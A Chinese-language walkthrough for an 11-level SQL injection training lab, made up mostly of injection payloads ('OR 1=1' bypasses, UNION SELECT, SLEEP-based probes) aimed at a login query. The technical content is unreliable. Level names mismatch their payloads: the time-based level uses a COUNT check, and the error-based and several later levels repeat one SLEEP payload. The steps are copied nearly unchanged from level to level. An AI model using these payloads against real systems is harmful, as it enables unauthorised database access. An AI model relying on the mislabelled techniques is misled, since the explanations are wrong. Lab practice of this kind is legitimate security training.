关卡一:基础输入型注入
攻略
- 观察目标:首先观察输入框,尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' OR '1'='1 - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
关卡二:联合查询注入
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' OR 1=1 LIMIT 1,1 - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' OR 1=1 LIMIT 1,1;
关卡三:时间盲注
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' AND (SELECT COUNT(*) FROM users) > 0 - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT COUNT(*) FROM users) > 0;
关卡四:布尔盲注
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' AND (SELECT COUNT(*) FROM users) > 1 - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT COUNT(*) FROM users) > 1;
关卡五:堆叠查询注入
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' UNION SELECT * FROM users - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' UNION SELECT * FROM users;
关卡六:报错注入
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b);
关卡七:错误信息注入
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND '1'='1 - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND '1'='1';
关卡八:条件语句注入
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) OR '1'='1 - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) OR '1'='1';
关卡九:盲注枚举用户名
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin' - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin';
关卡十:盲注枚举密码
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:如果输入单引号后返回错误,尝试构造以下payload:
' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND password = 'admin' - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND password = 'admin';
关卡十一:SQL盲注综合应用
攻略
- 观察目标:尝试输入单引号
',查看是否返回错误。 - 构造payload:结合之前学到的各种注入技巧,构造以下payload:
' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin' AND password = 'admin' - 测试payload:将构造的payload输入到输入框,如果返回正确结果,则说明存在SQL注入漏洞。
示例
-- 正确的查询语句
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- 构造的payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin' AND password = 'admin';
通过以上攻略,相信你已经掌握了SQL注入靶机11关挑战的解题技巧。在实际应用中,请务必遵守相关法律法规,切勿用于非法用途。祝你在网络安全领域取得更好的成绩!